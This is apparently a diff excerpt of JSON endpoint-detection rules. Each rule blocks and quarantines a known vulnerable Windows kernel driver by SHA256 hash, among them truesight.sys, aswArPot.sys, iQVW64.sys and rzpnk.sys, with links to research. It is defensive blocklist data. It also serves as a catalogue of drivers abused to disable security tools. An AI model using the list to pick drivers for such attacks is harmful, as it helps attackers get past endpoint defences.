"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487843Z", + "creation_date": "2026-03-23T11:45:31.487845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd558e1672f27fe33be51a323270220d801faa7a5161325b3f209a57165c2276", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bc26081-95be-5d44-a561-06ac2d24800a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825022Z", + "creation_date": "2026-03-23T11:45:31.825024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825030Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47b1d7407df6ae4e63d4a70c894fde455f8e93382ce2bb266a0b558e87c5215e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bc518ec-b0db-5c71-9c61-ecc662ba8092", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818049Z", + "creation_date": "2026-03-23T11:45:30.818051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bac7e75745d0cb8819de738b73edded02a07111587c4531383dccd4562922b65", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bd8df8d-38a9-5afc-9f94-c20ce89e8da2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150018Z", + "creation_date": "2026-03-23T11:45:31.150020Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a05d43c56290c41bd2eb75c19d32da821a055aa05c3b5bca2af047bd7cf01fe5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2becde35-7ed3-52c6-b3bc-f1bb773110ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981076Z", + "creation_date": "2026-03-23T11:45:29.981078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b19a7207a55d752db1b366b1dea2fd2c7620a825a3f0dcffca10af76611118c", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bf002f5-8d92-5942-83f1-e21ed0e1773c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622002Z", + "creation_date": "2026-03-23T11:45:29.622004Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622010Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ebc5906d7fd9c606dc6ef9b49f3e57b63af838f5807fcdcdd5ff47b5b05e39c", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bf9e2cb-de54-54eb-ac80-a2457b55239d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455700Z", + "creation_date": "2026-03-23T11:45:30.455704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "8dcec67a1f4903981c3e0ab938784c2f241e041e26748e1c22059e0e507cfb37", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c03667b-6c4b-5e6f-9b6a-46a9f437d2d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973535Z", + "creation_date": "2026-03-23T11:45:29.973537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "385485e643aa611e97ceae6590c6a8c47155886123dbb9de1e704d0d1624d039", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c07fd5f-b564-5da6-845d-e4dfb5461d6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478005Z", + "creation_date": "2026-03-23T11:45:31.478010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5075bbd95d7f849fceb89e8d8ee6e471f43f38f10e73ce0051c430860fd8bf82", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c0e5f36-b170-519b-9d56-7547d9f9149a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970193Z", + "creation_date": "2026-03-23T11:45:29.970195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970200Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8e307f2af1c1ae3d5ef6581e651823e3b6bfb9d7b565353cbd50e455c1dc9c8", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] 
[https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c11ca77-7e61-5be0-92c9-3ac811bc4926", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819411Z", + "creation_date": "2026-03-23T11:45:30.819413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "909f6c4b8f779df01ef91e549679aa4600223ac75bc7f3a3a79a37cee2326e77", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c19b064-0ba6-50e5-bbf2-d490e7d111ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972353Z", + "creation_date": "2026-03-23T11:45:29.972355Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cc54914473d7c75a483c5672655bd9df2ce20b556a0d92c6e4cb8722ab1647b", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c1b3711-43cc-5bd3-a4f2-38e5fa9f4a0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980567Z", + "creation_date": "2026-03-23T11:45:29.980569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bedb1e28fd1cdf391edc859c58cb318a9ab686f254195246909b245e7aaf7669", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c296f4f-092b-5712-9a72-5f6b814e6311", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495853Z", + "creation_date": "2026-03-23T11:45:31.495855Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28655efe3e72526fc4262af0ce8796e97afc40670f9f07cc0d3a6757ccf01b8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c298533-10ab-55ea-91a9-0cea427041a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985268Z", + "creation_date": "2026-03-23T11:45:29.985270Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985276Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fd7a44b042d397ad5a6417e4aa4b30eb2e40df6274d3ac7155ecc68c88cdb6d", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c2bc3d1-876e-520c-9924-2a7d6f490f64", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831901Z", + "creation_date": "2026-03-23T11:45:30.831903Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831908Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17f56891f409d185f9932c314c74fe4159f1bd98ef9461fb27cc6d43cdc051ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c4430c1-f79e-5c07-a7f1-c2e8015a8dfe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140170Z", + "creation_date": "2026-03-23T11:45:31.140172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140178Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3547ced5aba570748d3afc0b1c50d4303da5a7310bb184acffdc0e4a2a6df2d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c4b3f28-312a-564e-83ab-9c1aef5d36cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807427Z", + "creation_date": "2026-03-23T11:45:31.807429Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807435Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14841bd8f99ccfa7bd0498fa61b94be442b89a275ff658728f3c200ba7453f87", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c586110-3801-595a-b9db-140ecdbb1518", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144861Z", + "creation_date": "2026-03-23T11:45:31.144863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144879Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be0acb944b14fae853a06873bb74b3f0b4b9e9953f1ed190f4c870321abb55bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c69ad6e-25b6-5017-97de-e050310052af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980646Z", + "creation_date": "2026-03-23T11:45:29.980648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2e10e17bca5e85e6b84345b47aab14adf45d98c672db6acf90479a7faf20b5a", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c69dfec-5f73-5df3-a6fd-7c1beaeaf066", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822764Z", + "creation_date": "2026-03-23T11:45:30.822766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "811f82960814c21949534fc1808e341a5b22caf52a094e5e427dac3aa6c7aa73", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "2c766cfb-3e01-5c7d-86d7-7d5e83c04a37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811880Z", + "creation_date": "2026-03-23T11:45:31.811882Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811888Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3f57d2b8ee90e6abf95a794068b078cb460404b7bee8ebffb6af770e01ef755", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c92ca5c-5459-5868-8526-834399dde287", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824847Z", + "creation_date": "2026-03-23T11:45:30.824850Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de86f46cbe03899317ca5eea86d1d097e544981ebd4dd4e877fc4172331a0316", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c98ebff-946b-5325-9fe2-5942ea795da8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498334Z", + "creation_date": "2026-03-23T11:45:31.498337Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498345Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e5fc71ec72058d01e32845ea0face48d6c2db299d12d3e0a934aa2ae88cbfcb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2c9d0d07-0bf1-5b43-afd8-90f4787163ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608352Z", + "creation_date": "2026-03-23T11:45:29.608354Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1d632fec82d0d2e3caf808d0d63dd4e5e6e646011d7223b64fc8a396e3bb127", + "comment": "Vulnerable Kernel Driver (aka EnPortv.sys) [https://www.huntress.com/blog/encase-byovd-edr-killer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 